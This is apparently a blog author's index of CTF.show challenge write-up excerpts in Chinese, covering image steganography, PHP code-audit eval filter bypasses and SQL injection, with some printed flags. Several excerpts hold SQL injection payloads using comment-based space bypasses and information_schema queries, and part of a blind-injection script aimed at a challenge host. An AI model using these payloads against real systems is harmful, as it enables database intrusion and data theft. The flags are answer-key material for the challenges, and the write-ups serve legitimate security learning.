CTF.show
FW_ENJOEY
这个作者很懒,什么都没留下…
展开
-
CTF.show:misc入门50
misc50提示:有时候视线也要放低一点打开Stegsolve,换下通道得到。原创 2021-05-21 08:29:12 · 585 阅读 · 1 评论 -
CTF.show:misc入门24-49
上一次剩3题坐半天不会写。还是先把后面写了吧。只是为了自己记录,希望师傅们多提点建议多教教我。文章目录图片篇(文件结构)misc24misc25misc26图片篇(文件结构)misc24提示:flag在图片上面。misc25提示:flag在图片下面。打开图片,调整图片高度,得到flag。在这里插入图片描述ctfshow{494f611cc5842dd597f460874ce38f57}misc26提示:flag在图片下面。和25一样,也是改高度,但是这次改的比较多得到f原创 2021-04-10 13:10:58 · 2338 阅读 · 4 评论 -
CTF.show:misc入门1-23
八神爷爷出的题,很适合新手入门我只是记录一下自己做题过程,没啥技术含量目录图片篇(基础操作)misc1misc2misc3misc4图片篇(信息附加)misc5misc6misc7misc8misc9图片篇(基础操作)misc1图片打开就是flagctfshow{22f1fb91fc4169f1c9411ce632a0ed8d}misc2打开图片是一串乱码,但是很明显存在一个png的文件头修改文件名后缀为png,得到flagctfshow{6f66202f21ad22a2a19原创 2021-03-29 20:53:24 · 3937 阅读 · 3 评论 -
CTF.show:新春红包题wp
这次ctfshow的新春赛,一共八题,领到了六题的红包,第八题是我出的,然后除了狸题最后都有做出来。菜鸡一个罢了,简单写的wp师傅们蛮看看点点关注。然后感谢做题过程中大师傅们的帮助,就不一一点名了,都是大师傅带的好我才做的出来的。文章目录除夕:属于大牛的压缩包初一:爆竹声声初二:先天八卦操初三(情人节):阴阳人初四:长虫初五:新年好?初六:牛年大吉2.0初七:古代非对称密码除夕:属于大牛的压缩包题目打开,修改文件名后缀为zip,打开后发现存在25个图片,复制25份,每份留下一份图片,对压缩包密码.原创 2021-02-18 21:47:01 · 2867 阅读 · 1 评论 -
CTF.show:web1_此夜圆
先看一下源码<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->password==='yu22原创 2021-02-05 14:24:54 · 571 阅读 · 0 评论 -
CTF.show:萌新:web13
<?php# flag in config.phpinclude("config.php");if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c)){ eval($c); }else{ die("cmd error");原创 2021-02-04 22:55:29 · 643 阅读 · 1 评论 -
CTF.show:萌新:web12
<?php# flag in config.phpinclude("config.php");if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c)){ eval($c); }else{ die("cmd error"); }原创 2021-02-04 22:16:12 · 351 阅读 · 0 评论 -
CTF.show:萌新:web11
<?php# flag in config.phpinclude("config.php");if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight|cat/i",$c)){ eval($c); }else{ die("cmd error"); }}else{原创 2021-02-04 22:01:36 · 325 阅读 · 1 评论 -
CTF.show:萌新:web10
<?php# flag in config.phpinclude("config.php");if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); }}else{ hig原创 2021-02-04 21:50:53 · 346 阅读 · 0 评论 -
CTF.show:萌新:web9
<?php# flag in config.phpinclude("config.php");if(isset($_GET['c'])){ $c = $_GET['c']; if(preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); }}else{ high原创 2021-02-04 21:25:01 · 528 阅读 · 0 评论 -
CTF.show:veryphp
先审计一下代码<?phperror_reporting(0);highlight_file(__FILE__);include("config.php");class qwq{ function __wakeup(){ die("Access Denied!"); } static function oao(){ show_source("config.php"); }}$str = file_get_contents("原创 2021-01-28 23:38:18 · 534 阅读 · 0 评论 -
CTF.show:萌新专属红包题
账号密码为admin和admin888.登陆后进行抓包,然后再发一次得到flag把flag进行md5转换一下原创 2021-01-17 22:25:20 · 860 阅读 · 0 评论 -
CTF.show:web14
打开来后执行语句得到提示?c=3当c为3时,不会退出循环,进而执行下一个case语句得到urlhere_1s_your_f1ag.php进入之后发现是一道注入题目查看源代码发现存在提示if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){ die('@A@');老样子先爆库名/here_1s_your_f1ag.原创 2021-01-16 23:12:43 · 375 阅读 · 0 评论 -
CTF.show:红包题第二弹
学习一下知识点:先马住p神的两篇文章一些不包含数字和字母的 webshellhttps://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html无字母数字 webshell 之提高篇https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html这一段Y1ng师傅说的很详细了https://www.gem-love.com/web原创 2021-01-15 23:38:15 · 1660 阅读 · 0 评论 -
CTF.show:web13
扫描后发现存在upload.php.bak.bak文件是备份文件。这里列举一下常见的源码泄露.hg源码泄漏.git源码泄漏.DS_Store文件泄漏.phps .bak结尾的网页<?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.原创 2021-01-15 19:14:18 · 1943 阅读 · 0 评论 -
CTF.show:web12
右键查看源代码有提示,试一下cmd=phpinfo();出现回显,采用glob通配符命令得到文件名php的函数glob(); glob() 函数返回匹配指定模式的文件名或目录。举个例子:glob("") 匹配任意文件glob(".txt")匹配以txt为后缀的文件有了这个方法我们先把当前目录下所有的文件找出来看看有没有可用的。输入?cmd=print_r(glob("*"));打印出了如下文件尝试进入那个很长的php文件利用highlight_file函数/?cmd=high原创 2021-01-15 18:15:53 · 407 阅读 · 0 评论 -
CTF.show:web11
代码审计<?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if(strlen($password)!=strlen(replaceSpecialChar原创 2021-01-15 18:04:34 · 249 阅读 · 0 评论 -
CTF.show:web10
和web9一样。先查看一下源码,右键查看源代码进入style.css发现有index.phps在url处输入后,查看源码得到<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"原创 2021-01-15 17:49:34 · 709 阅读 · 0 评论 -
CTF.show:web9
打开题目发现有注入框,简单的注入测试后发现没有效果,扫描一下,发现存在robots.txt进入robots.txt查看文件下载后打开发现有源代码<?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and pass原创 2021-01-15 17:21:14 · 599 阅读 · 0 评论 -
CTF.show:web7-web8
web7这题是一题盲注题,对url进行盲注测试从网上找到的师傅的爆表名脚本import requestsurl = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/"def db(url): # 爆库名 for i in range(1, 5): for j in range(32, 128): u = "or/**/ascii(s原创 2021-01-15 16:32:24 · 930 阅读 · 0 评论 -
CTF.show:web6
登陆窗,先想到sql注入抓包测试发现失败利用/**/代替空格进行绕过username=admin'/**/or/**/1=1#&password=123456利用联合查询找到回显位置username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456查数据库名username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3原创 2021-01-15 14:43:02 · 444 阅读 · 0 评论 -
CTF.show:web5
页面出来是一段源代码,应该是代码审计的题目 <?php $flag=""; $v1=$_GET['v1']; $v2=$_GET['v2']; if(isset($v1) && isset($v2)){ if(!ctype_alpha($v1)){ die("v1 error"); } if(!is_numeric(原创 2021-01-14 23:39:30 · 270 阅读 · 0 评论 -
CTF.show:WEB:web签到题-web4
ctf.show做题记录web签到题web2web3web签到题查看源码得到flagweb2手抖点到hint索性直接全抄1.查当前数据库名称 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 得到数据库名称web22.查看数据库表的数量' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'原创 2021-01-12 22:21:35 · 2682 阅读 · 1 评论